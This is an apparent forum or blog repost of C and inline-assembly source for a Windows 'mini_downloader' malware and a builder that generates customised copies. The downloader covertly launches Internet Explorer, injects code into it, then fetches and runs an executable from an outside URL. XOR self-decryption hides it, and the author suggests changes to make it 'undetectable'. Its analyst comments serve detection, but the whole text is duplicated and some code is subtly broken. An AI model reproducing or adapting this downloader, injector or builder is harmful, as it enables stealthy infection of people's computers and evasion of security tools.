3K下载者.txt
来源:互联网 发布:网络暴力案例 编辑:程序博客网 时间:2024/04/18 05:58
/*
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
// Function pointers that are filled in at run time with GetProcAddress (in
// download() and main()); the trailing comment on each line names the API it holds.
// Analyst note: because the APIs are looked up by name, the import table alone
// may not show the download, execute and remote-thread capability of this binary.
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
// Handle to the target process, opened in main() with OpenProcess.
HANDLE processhandle;
// Process id of the window that main() finds with FindWindow.
DWORD pid;
// Module handles returned by LoadLibrary for Shell32.dll, urlmon.dll and KERNEL32.dll.
HINSTANCE hshell,hurlmon,hkernel;
// Thread routine that main() starts inside the Internet Explorer process with
// CreateRemoteThread. It downloads a file over HTTP and runs it:
//   1. loads Shell32.dll and urlmon.dll and resolves ShellExecuteA and
//      URLDownloadToFileA by name;
//   2. saves the hard-coded URL to c://ieinst12.exe;
//   3. opens that file with ShellExecuteA;
//   4. calls ExitProcess(0).
// No return value is checked.
// Detection notes: the HTTP request and the file write come from the browser
// process rather than from this executable, so the observable artifacts are the
// dropped file c://ieinst12.exe and the browser process launching it.
void download() //thread function to be injected to IE
{
// Resolve the two APIs by name at run time.
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
// Fetch the hard-coded URL and store it at a fixed path on drive C.
DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
// Run the downloaded file (verb "open", show command 5).
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
// ExitProcess ends the whole process this thread runs in, not only the thread.
ExitProcess(0);
};
// Copies this program's own in-memory image into an Internet Explorer process
// and starts download() there as a remote thread. Called from decrpt(), which
// is the real entry point (see the /ENTRY linker pragma).
// No return value is checked at any step.
// Detection notes: the sequence below -- a hidden browser launch followed by
// OpenProcess(PROCESS_ALL_ACCESS), VirtualAllocEx with PAGE_EXECUTE_READWRITE,
// WriteProcessMemory and CreateRemoteThread against that browser -- is what
// process-access and remote-thread telemetry records (for example Sysmon
// events 10 and 8). In the target, the result is a private RWX region holding
// a PE image at the base chosen by the /BASE linker pragma, not backed by a file.
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
// Keep only the first three characters of the Windows directory (the drive
// root) and append the fixed Internet Explorer path.
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
// Start the browser with its window hidden, then wait half a second for the
// window to exist.
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
// Any top-level window of class "IEFrame" is accepted, so this can also match
// a browser window that was already open.
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
// Reads the DWORD at offset 0x3c of the image (e_lfanew in the DOS header),
// then the DWORD at that offset + 0x50, which is SizeOfImage in a PE32 header.
// The value, not a pointer, is stored in lpimagesize.
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
// Requests memory in the target at the same address as this image's own base,
// readable, writable and executable. (Original comment, translated: determine
// the position of the start base address and the memory image base address.)
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
// Takes the address of download() in this process; the remote thread is
// started at that same address in the target.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// CreateRemoteThread is resolved by name instead of being called directly.
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
// Program entry point (set by the /ENTRY:decrpt linker pragma). It XORs the
// code bytes that lie between the addresses of download() and decrpt() with the
// single byte 0x2c, in place, and then calls main().
// The routine depends on the functions being laid out in memory in source
// order (download, main, decrpt); the byte count is decrpt - download.
// Analyst notes: the encoding is a one-byte XOR whose key is the immediate in
// "mov edx,0x2c" below, so the encoded region of a sample can be decoded
// statically once that byte is read from the stub. Making the program's own
// code pages writable and executable (VirtualProtectEx below) is itself an
// observable behaviour.
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
// Make 0x1000 bytes starting at download() readable, writable and executable
// in the current process so the code can be rewritten in place.
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
// Copies (decrpt - download) bytes into the 500-byte stack buffer.
// NOTE(review): nothing checks that this count fits in shellcode[500].
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
// Reads each saved byte from shellcode, XORs it with 0x2c and writes it back
// over the original location, from download() up to decrpt().
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
// main() runs inside a structured-exception handler whose handler body is
// empty, so any exception raised while it runs is silently discarded.
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
I modified some snippets of it, especially the decrypt function. I removed the for loop so that the code is XORed only once. I think you can do many things to customize the code to fit a specific mission: for example, you can use shellcoding methods to add a decode block to the front of the decoded data so that it works well, or randomly encrypt any block of the main code to make it undetectable.
Note that the code above cannot be launched as a stand-alone program; in other words, you must encrypt the download() and main() functions manually before it is launched. To make this easy, I coded a SIMPLE program in C: a generator.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
// Dialog window handle, stored by DialogProc on WM_INITDIALOG.
HWND hDlg;
// URL text read from the first edit control; copied into the output file by MakeDlExe.
char url[76];
// Two-character key text read from the second edit control, plus terminator.
char key[3];
// Key byte that String2Bytes produces from the key text.
unsigned char nkey;
//convert string to bytes,borrowed from the internet
// Packs pairs of hexadecimal digit characters into bytes.
//   pSrc       - source characters, read two at a time (high digit first)
//   pDst       - receives one byte per character pair
//   nSrcLength - number of source characters to consume
// Returns nSrcLength / 2.
// Only '0'..'9' is range-checked; every other character is converted as if it
// were an upper-case letter counted from 'A', with no validation.
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
    for (int pos = 0; pos < nSrcLength; pos += 2, ++pDst)
    {
        // High digit goes into the upper four bits.
        const char hi = pSrc[pos];
        *pDst = (hi >= '0' && hi <= '9') ? ((hi - '0') << 4)
                                         : ((hi - 'A' + 10) << 4);

        // Low digit is OR-ed into the same byte.
        const char lo = pSrc[pos + 1];
        *pDst |= (lo >= '0' && lo <= '9') ? (lo - '0')
                                          : (lo - 'A' + 10);
    }
    return nSrcLength / 2;
}
// Validates the two-character text in the global `key`.
// Returns true only when both characters are '0'..'9' or lower-case 'a'..'f'
// and the pair is neither "00" nor "ff"; returns false otherwise.
BOOL CheckKey(void)
{
    const char first = key[0];
    const char second = key[1];

    const bool firstIsHex = (first >= '0' && first <= '9') || (first >= 'a' && first <= 'f');
    const bool secondIsHex = (second >= '0' && second <= '9') || (second >= 'a' && second <= 'f');
    if (!(firstIsHex && secondIsHex))
        return false;

    // The two extreme values are rejected.
    if ((first == '0' && second == '0') || (first == 'f' && second == 'f'))
        return false;

    return true;
}
// Builds the output executable from a template stored as a resource of this
// program: the template (resource type "SERVER", id IDR_SERVER1) is copied to
// memory, patched at fixed offsets and written to "stealth.exe" in the
// current directory.
// Patches applied to the copy:
//   offset 0x258         - 76 bytes taken from the global `url`
//   offset 0x5d7         - the one-byte key `nkey`
//   offsets 0x360..0x54f - each byte XORed with `nkey` (0x550 - 0x360 bytes)
// Analyst notes: the URL field lies outside the XORed range, so in a file
// produced by this routine the URL is stored unencoded at offset 0x258 and the
// key byte at offset 0x5d7; both can be read directly from a sample built from
// the same template. Nothing checks that the resource is large enough for
// these offsets.
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
// Locate the embedded template.
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
// Convert the two-character key text to one byte, then write the URL and the
// key byte into the template copy at their fixed offsets.
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
// XOR every byte from p+0x360 up to (not including) p+0x550 with nkey, in place.
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
// Dialog procedure for the generator's single window.
//   WM_INITDIALOG - stores the dialog handle, fills the URL and key edit
//                   controls with default text and limits them to 76 and 2
//                   characters
//   WM_CLOSE      - ends the dialog
//   WM_DESTROY    - posts a quit message
//   WM_COMMAND    - IDC_BUTTON1 reads the URL and key, validates the key with
//                   CheckKey() and calls MakeDlExe(); IDC_BUTTON2 ends the dialog
// Always returns 0.
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
// Default values shown in the two edit controls.
SetDlgItemText(hDlg,IDC_EDIT1,"http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
// NOTE(review): this clears MAX_PATH bytes starting at url, but url is
// declared as char url[76].
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
// Entry point of the generator: shows the dialog IDD_DIALOG1 as a modal dialog
// driven by DialogProc and returns 0 when it closes. The other parameters are
// not used.
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
// Function pointers that are filled in at run time with GetProcAddress (in
// download() and main()); the trailing comment on each line names the API it holds.
// Analyst note: because the APIs are looked up by name, the import table alone
// may not show the download, execute and remote-thread capability of this binary.
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
// Handle to the target process, opened in main() with OpenProcess.
HANDLE processhandle;
// Process id of the window that main() finds with FindWindow.
DWORD pid;
// Module handles returned by LoadLibrary for Shell32.dll, urlmon.dll and KERNEL32.dll.
HINSTANCE hshell,hurlmon,hkernel;
// Thread routine that main() starts inside the Internet Explorer process with
// CreateRemoteThread. It downloads a file over HTTP and runs it:
//   1. loads Shell32.dll and urlmon.dll and resolves ShellExecuteA and
//      URLDownloadToFileA by name;
//   2. saves the hard-coded URL to c://ieinst12.exe;
//   3. opens that file with ShellExecuteA;
//   4. calls ExitProcess(0).
// No return value is checked.
// Detection notes: the HTTP request and the file write come from the browser
// process rather than from this executable, so the observable artifacts are the
// dropped file c://ieinst12.exe and the browser process launching it.
void download() //thread function to be injected to IE
{
// Resolve the two APIs by name at run time.
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
// Fetch the hard-coded URL and store it at a fixed path on drive C.
DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
// Run the downloaded file (verb "open", show command 5).
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
// ExitProcess ends the whole process this thread runs in, not only the thread.
ExitProcess(0);
};
// Copies this program's own in-memory image into an Internet Explorer process
// and starts download() there as a remote thread. Called from decrpt(), which
// is the real entry point (see the /ENTRY linker pragma).
// No return value is checked at any step.
// Detection notes: the sequence below -- a hidden browser launch followed by
// OpenProcess(PROCESS_ALL_ACCESS), VirtualAllocEx with PAGE_EXECUTE_READWRITE,
// WriteProcessMemory and CreateRemoteThread against that browser -- is what
// process-access and remote-thread telemetry records (for example Sysmon
// events 10 and 8). In the target, the result is a private RWX region holding
// a PE image at the base chosen by the /BASE linker pragma, not backed by a file.
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
// Keep only the first three characters of the Windows directory (the drive
// root) and append the fixed Internet Explorer path.
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
// Start the browser with its window hidden, then wait half a second for the
// window to exist.
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
// Any top-level window of class "IEFrame" is accepted, so this can also match
// a browser window that was already open.
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
// Reads the DWORD at offset 0x3c of the image (e_lfanew in the DOS header),
// then the DWORD at that offset + 0x50, which is SizeOfImage in a PE32 header.
// The value, not a pointer, is stored in lpimagesize.
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
// Requests memory in the target at the same address as this image's own base,
// readable, writable and executable. (Original comment, translated: determine
// the position of the start base address and the memory image base address.)
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
// Takes the address of download() in this process; the remote thread is
// started at that same address in the target.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// CreateRemoteThread is resolved by name instead of being called directly.
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
// Program entry point (set by the /ENTRY:decrpt linker pragma). It XORs the
// code bytes that lie between the addresses of download() and decrpt() with the
// single byte 0x2c, in place, and then calls main().
// The routine depends on the functions being laid out in memory in source
// order (download, main, decrpt); the byte count is decrpt - download.
// Analyst notes: the encoding is a one-byte XOR whose key is the immediate in
// "mov edx,0x2c" below, so the encoded region of a sample can be decoded
// statically once that byte is read from the stub. Making the program's own
// code pages writable and executable (VirtualProtectEx below) is itself an
// observable behaviour.
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
// Make 0x1000 bytes starting at download() readable, writable and executable
// in the current process so the code can be rewritten in place.
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
// Copies (decrpt - download) bytes into the 500-byte stack buffer.
// NOTE(review): nothing checks that this count fits in shellcode[500].
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
// Reads each saved byte from shellcode, XORs it with 0x2c and writes it back
// over the original location, from download() up to decrpt().
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
// main() runs inside a structured-exception handler whose handler body is
// empty, so any exception raised while it runs is silently discarded.
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
I modified some snippets of it, especially the decrypt function. I removed the for loop so that the code is XORed only once. I think you can do many things to customize the code to fit a specific mission: for example, you can use shellcoding methods to add a decode block to the front of the decoded data so that it works well, or randomly encrypt any block of the main code to make it undetectable.
Note that the code above cannot be launched as a stand-alone program; in other words, you must encrypt the download() and main() functions manually before it is launched. To make this easy, I coded a SIMPLE program in C: a generator.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
// Dialog window handle, stored by DialogProc on WM_INITDIALOG.
HWND hDlg;
// URL text read from the first edit control; copied into the output file by MakeDlExe.
char url[76];
// Two-character key text read from the second edit control, plus terminator.
char key[3];
// Key byte that String2Bytes produces from the key text.
unsigned char nkey;
//convert string to bytes,borrowed from the internet
// Packs pairs of hexadecimal digit characters into bytes.
//   pSrc       - source characters, read two at a time (high digit first)
//   pDst       - receives one byte per character pair
//   nSrcLength - number of source characters to consume
// Returns nSrcLength / 2.
// Only '0'..'9' is range-checked; every other character is converted as if it
// were an upper-case letter counted from 'A', with no validation.
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
    for (int pos = 0; pos < nSrcLength; pos += 2, ++pDst)
    {
        // High digit goes into the upper four bits.
        const char hi = pSrc[pos];
        *pDst = (hi >= '0' && hi <= '9') ? ((hi - '0') << 4)
                                         : ((hi - 'A' + 10) << 4);

        // Low digit is OR-ed into the same byte.
        const char lo = pSrc[pos + 1];
        *pDst |= (lo >= '0' && lo <= '9') ? (lo - '0')
                                          : (lo - 'A' + 10);
    }
    return nSrcLength / 2;
}
// Validates the two-character text in the global `key`.
// Returns true only when both characters are '0'..'9' or lower-case 'a'..'f'
// and the pair is neither "00" nor "ff"; returns false otherwise.
BOOL CheckKey(void)
{
    const char first = key[0];
    const char second = key[1];

    const bool firstIsHex = (first >= '0' && first <= '9') || (first >= 'a' && first <= 'f');
    const bool secondIsHex = (second >= '0' && second <= '9') || (second >= 'a' && second <= 'f');
    if (!(firstIsHex && secondIsHex))
        return false;

    // The two extreme values are rejected.
    if ((first == '0' && second == '0') || (first == 'f' && second == 'f'))
        return false;

    return true;
}
// Builds the output executable from a template stored as a resource of this
// program: the template (resource type "SERVER", id IDR_SERVER1) is copied to
// memory, patched at fixed offsets and written to "stealth.exe" in the
// current directory.
// Patches applied to the copy:
//   offset 0x258         - 76 bytes taken from the global `url`
//   offset 0x5d7         - the one-byte key `nkey`
//   offsets 0x360..0x54f - each byte XORed with `nkey` (0x550 - 0x360 bytes)
// Analyst notes: the URL field lies outside the XORed range, so in a file
// produced by this routine the URL is stored unencoded at offset 0x258 and the
// key byte at offset 0x5d7; both can be read directly from a sample built from
// the same template. Nothing checks that the resource is large enough for
// these offsets.
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
// Locate the embedded template.
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
// Convert the two-character key text to one byte, then write the URL and the
// key byte into the template copy at their fixed offsets.
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
// XOR every byte from p+0x360 up to (not including) p+0x550 with nkey, in place.
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
// Dialog procedure for the generator's single window.
//   WM_INITDIALOG - stores the dialog handle, fills the URL and key edit
//                   controls with default text and limits them to 76 and 2
//                   characters
//   WM_CLOSE      - ends the dialog
//   WM_DESTROY    - posts a quit message
//   WM_COMMAND    - IDC_BUTTON1 reads the URL and key, validates the key with
//                   CheckKey() and calls MakeDlExe(); IDC_BUTTON2 ends the dialog
// Always returns 0.
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
// Default values shown in the two edit controls.
SetDlgItemText(hDlg,IDC_EDIT1,"http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
// NOTE(review): this clears MAX_PATH bytes starting at url, but url is
// declared as char url[76].
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
// Entry point of the generator: shows the dialog IDD_DIALOG1 as a modal dialog
// driven by DialogProc and returns 0 when it closes. The other parameters are
// not used.
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif